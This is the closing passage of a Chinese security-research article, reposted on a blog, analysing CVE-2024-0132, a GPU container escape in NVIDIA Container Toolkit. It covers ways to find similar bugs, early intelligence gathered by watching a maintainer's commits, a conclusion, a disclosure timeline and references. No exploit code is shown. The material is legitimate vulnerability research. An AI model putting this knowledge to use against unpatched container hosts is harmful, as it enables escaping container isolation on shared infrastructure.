十一、同类问题挖掘方法

level
挖掘方法
设计层
✔️
安全模型
✔️
Fuzz
codeql

十二、漏洞情报

1. 如何获知本漏洞情报

2024年9月30日,通过漏洞情报平台感知。

2. 有无可能早于业界感知漏洞

漏洞修复者elezar在2024年9月11日,由个人的公开仓库向主仓提交了PRlibnvidia-container#282

因此可以通过监控他的commit行为来提前感知漏洞。

十三、总结

Wiz 安全研究团队近期在重点研究 AI 安全, CVE-2024-0132 作为 GPU 容器逃逸的首个漏洞, 是 AI 基础设施安全的一个重要组成部分。

本漏洞原理简单,发现起来较为容器,但 nvidia-container-toolkit 作为第三方提供的容器组件,以往研究者关注度较少,近期 AI 热潮才引起关注。

在研究过程中,发现该组件整体代码质量不高、NVIDIA对该项目的投入精力较低。未来,该组件的更多风险还值得进一步研究。

时间线

  • 2018-09-14: 开发者引入漏洞
  • 2024-09-01: Wiz 向 NVIDIA PSIRT 报告漏洞
  • 2024-09-03: NVIDIA 确认漏洞
  • 2024-09-26: NVIDIA 发布修复版本
  • 2024-09-30: 采集到漏洞情报,开展漏洞分析与应急
  • 2024-10-14: Wiz暂未公开漏洞细节,我完成业界首个漏洞复现
  • 2025-01-06: 本文完稿
  • 2025-02-13: 我在微信公众号发布本文

参考链接

  • https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
  • https://nvidia.custhelp.com/app/answers/detail/a_id/5582

本文使用“漏洞研究: 漏洞分析与复现”(https://github.com/ssst0n3/security-research-specification)作为文档基线。


原文始发于微信公众号(石头的安全料理屋):首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月13日21:10:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   首个GPU容器逃逸: NVIDIA Container Toolkit CVE-2024-0132 漏洞分析https://cn-sec.com/archives/3738386.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息